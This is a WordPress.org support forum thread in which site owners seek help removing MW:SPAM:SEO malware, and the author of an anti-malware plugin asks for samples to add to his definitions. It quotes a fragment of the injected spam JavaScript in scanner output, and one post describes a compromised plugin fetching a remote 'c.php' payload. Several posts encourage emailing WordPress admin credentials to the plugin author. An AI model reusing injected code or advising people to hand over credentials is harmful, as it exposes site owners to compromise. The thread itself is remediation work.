WordPress.org

Ready to get started?Download WordPress

Forums

Anti-Malware (Get Off Malicious Scripts)
[resolved] Cant remove MW:SPAM:SEO (27 posts)

  1. ziggynerja1
    Member
    Posted 1 year ago #

    Hi there, Sucuri has detected the known malware MW:SPAM:SEO on our webstie. We ran the plugin and removed a number of threats within the kses.php file. However, we are still receving ad's all over our website, and sucuri is picking up the same threats.

    What can I do to get the issues resolved? I'm not sure if it could be a bad plugin, or currupted FTP password? I'd really appreciate your help, and be happy to donate.

    Thank you!

    http://wordpress.org/extend/plugins/gotmls/

  2. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    I doubt it's your FTP password but it never hurts to change a password
    (unless you forget what you changed it to ;-)

    Assuming you have updated the definitions and scanned the whole site with my plugin then I would say you probably have a new threat that my plugin is not aware of. The next step, if you are willing, is to give me access to your WP Admin and I will find this new threat and define it so that it can be automatically removed by my plugin.

    If you want to send me a login you can email me directly: eli at gotmls.net

  3. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Hey Jack,
    Just following up to make sure your site is staying clean. You haven't had that virus come have you?

    Let me know if you need any more help.

    Aloha, Eli

  4. Denis Ciumbargi
    Member
    Posted 1 year ago #

    My site is infected now with same thing.

    I just installed the plugin, hope it will solve things up.

    Any instructions for a better scan in case the scan misses things?

    Sucury provided several links that have been infected already, from 2 now is spreaded to 8 links.

  5. Denis Ciumbargi
    Member
    Posted 1 year ago #

    Worked nicely, scanned, found, fixed. Thank you!

  6. majalla
    Member
    Posted 1 year ago #

    Hi,

    I have just installed your scanner in one of my test sites, (www.majalla.eu), and it did scann, but it did not find the "MW:SPAM:SEO" code. I still have them on the site, and I have checked almost all the files but canot find the location of these codes...

    Below is the Securi scanners results ...

    ===
    url: http://sitecheck.sucuri.net/results/majalla.eu

    web site: majalla.eu
    status: Site infected with malware
    web trust: Not Blacklisted
    *Cached results from the last 24 hrs.

    Malware found in the URL: http://www.majalla.eu/
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/404testpage4525d2fdc
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/404javascript.js
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/about-us
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/writers
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/submissions
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/category/turkey-news
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    ===

    Based on the Securi Results when I check the ViewSource for the home page for example, and on the ViewSource I search for the abouve code snipets, I can easily find that on the Source, but canot find it on any files...

    ===

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    ===

    Can you kindly get the abouve located and cleaned ASAP ...

    Thanking you,

    Best regards,

    Fawaz

  7. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Majalla,
    It looks like you have already removed this threat. I just helped someone else remove it too. It was in the social-media-widget plugin. Is that where you found it too?

    It would help me to add a definition for it if you were able to send me the code you removed from that file. Can you contact me and let me know what you found?

    Thanks, Eli

  8. majalla
    Member
    Posted 1 year ago #

    Hi Eli,

    Yes, you are right. Your Malware Tool is great, but unfortunately it did not have the definitions I guess and did not much of a good. But some of our great friends from WP Camp, helped me point to the right direction. Dave from LA Marketing was able to identify the culprit on the "Social Media Widget" plugin. Simply updating the plugin was able to resolve the issue.

    Yes, I downloaded the full site yesterday to review the files before updating the plugin. I got the file ... "social-widget.php" ... seems it was trying to connect to a URL and fetching a file named "c.php" and imploding it ...

    === The Script is as below ===

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    Hope this helps ...

    For more help pls. feel free to contact Dave who was the original genius who helped identify this from LA Marketing ...

    Thanks and Regards,

    Fawaz

  9. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Thanks Majalla,
    I have added this new threat to my Definition Update so it can now be repaired automatically with my Amti-Malware.

    I really appreciate your help in identifying this new threat.

    Aloha, Eli

  10. zahweb
    Member
    Posted 1 year ago #

    I also ran sucuri and it detected MW:SPAM:SEO. But running the scanner did not detect on my site. Am i doing something wrong?

  11. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    zahweb,
    You might have a new variant of this threat that has not yet been identified in my Definition Updates. If you are willing to let me into your WP Admin I will track it down and add it to my definitions so the It can be automatically removed.

    You can send login credentials directly to my email: eli at gotmls dot net
    Don't post them here ;-)

    Aloha, Eli

  12. zahweb
    Member
    Posted 1 year ago #

    Just sent to you, if you can update thanks.

  13. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    zahweb,
    I see you have restored your site and the ad link injected on your homepage is gone. That's good but we didn't figure out where it was coming from so it could come back if your server still has the same vulnerability that let it in the first time. If you do get re-infected consider my offer to copy your site to my server for further testing.

    Aloha, Eli

  14. FrankJames
    Member
    Posted 11 months ago #

    Aloha

    I have the sames issue as zahweb. The plugin cannot find MW:SPAM:SEO as detected by sucuri.

    Was a cure found? I would be willing to assist in it's demise. What can I do? How can I find this damn thing?

    Thanks
    Frank

  15. Eli
    Member
    Plugin Author

    Posted 11 months ago #

    MW:SPAM:SEO is a very generic definition. There are lots of threats that my plugin will find and fix that fall under that description. There are also always new threat coming out that my plugin cannot always identify and automatically fix until add them to my definition update.

    If yo are willing to give me a WP Admin login to your site I will look for this new threat and add it to my definition update so that it can be automatically removed.

    You can email me directly at: eli AT gotmls DOT net

    Aloha, Eli

  16. FrankJames
    Member
    Posted 11 months ago #

    Eli,

    I found the code in the theme header.php file. I sent it to you. Please add it to your definitions. I will wait to remove it so I can test your plugin.

    Thanks
    Frank

  17. Eli
    Member
    Plugin Author

    Posted 11 months ago #

    FrankJames,
    I have not received any emails form you. Maybe it's getting blocked because of the malicious content. Check the address you sent it to and maybe try just sending me a test message to make sure I get it.

    Also, if you have a place that you can post or upload the code to then you can send me a link to it or post the link here.

    Thanks for working with me to update definition. I will add this code as soon as I get it so that you can test it right away.

    Aloha, Eli

  18. FrankJames
    Member
    Posted 11 months ago #

  19. Eli
    Member
    Plugin Author

    Posted 11 months ago #

    Aloha FrankJames,
    Thank you so much for posting that code. I have added it to my definitions update o that it can be automatically removed. I have only tested this one on my own test servers by infecting a few of my testing sites with the code you posted. Please download my latest definition update and make sure it works on your live infection.

    Mahalo nui, Eli

  20. livingonbeans
    Member
    Posted 10 months ago #

    Hi,

    I have the same issue, specifically spam messages when posting a link on facebook, does anyone have an idea what this could be, the plugin didn't seem to find it.
    Thanks,
    Danny
    http://www.livingonbeans.com

  21. Eli
    Member
    Plugin Author

    Posted 10 months ago #

    Danny,
    I replied to your post on my forum too. Here is what I said:
    Have you already removed some threats from your site? Because Facebook actually caches your site, it may take a little while before your post look clean.
    If you have not found anything wrong on the site yet and you need my help to locate the malicious code just send me your WP Admin login and I’ll take a look.

    Aloha, Eli

  22. fifer1863
    Member
    Posted 10 months ago #

    Having similar issue. Sucuri is saying MW:SPAM:SEO threat. I have ran complete scans of everything but cannot locate the threat.

    Jim
    http://www.jimbeeghley.com

  23. WPyogi
    Volunteer Moderator
    Posted 10 months ago #

    @fifer1863 - please start your own thread - "similar" is not the same and this thread is outdated and already marked resolved.

  24. guestmm
    Member
    Posted 8 months ago #

    similar
    Hello I installed the plugin but no files were found to be bad. But i still have the problem.

    site: http://www.ashleyrobertsonline.com/main/

  25. Eli
    Member
    Plugin Author

    Posted 8 months ago #

    This is probably a new threat. I would be happy to help you find it and add it to my definition update so that it can be automatically removed, but please don't post anymore on this thread. As WPyogi said "this thread is outdated and already marked resolved". It is better to contact me on my own site gotmls.net or at least start a new thread here on wordpress.org.

    If you want me to look at your specific issue you will need to send your WP Admin credentials directly to me: eli AT gotmls DOT net

    Aloha, Eli

  26. r_magowan
    Member
    Posted 8 months ago #

    Hi there,
    Can you let me know the name of your plugin that can remove this MW:SPAM:SEO malware?
    Thanks.

  27. Eli
    Member
    Plugin Author

    Posted 8 months ago #

    It's tagged at the top of this thread:
    Anti-Malware (Get Off Malicious Scripts)

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags

No tags yet.